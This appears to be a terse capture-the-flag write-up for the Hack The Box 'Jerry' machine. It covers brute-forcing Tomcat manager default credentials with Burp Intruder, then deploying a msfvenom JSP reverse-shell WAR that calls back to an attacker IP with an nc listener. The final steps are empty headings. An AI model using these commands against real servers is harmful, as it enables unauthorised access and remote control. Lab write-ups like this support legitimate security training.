Jerry
HTB - 5. Jerry (Default Credentials)
nmap -T4 -p- -A 10.10.10.95
shows 8080 open with Apache Tomcat/Coyote JSP engine 1.1 and Tomcat version 7.0.88Go to
10.10.10.95
and shwos Apache Tomcat default pageSearch
tomcat default credentials
and found https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdownBurp Suite
Click server management page
Try login with
tomcat:tomcat
Send to decoder
Select authorization basic and decode as base64
Forwarded and did not work
Try again and sent to repeater and intruder
Create passwords
Get from the url and replace " " with ":".
Write bash script to base64 encode all the credentials
Back to Burp Suite Intruder
Set to sniper attack
Select the authorization basic
Paste in list of base64 encoded usernames and passwords into Payloads/Payload Options
Disable URL encoder
Run and see much longer length code 200 for the successful credientials:
tomcat:s3cret
Create WAR file exploit
Search
tomcat war reverse shell msfvenom
: https://netsec.ws/?p=331msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f war > shell.war
which will try to connect to our computer on port 4444nc -nvlp 4444
to listen on port 4444Upload to tomcat managment server and deploy
Go to
/shell
and gotnt authoirty/system
New reverse shell Create payload:
Listen on port 5555:
Transfer file to windows:
Result: shell popped
Last updated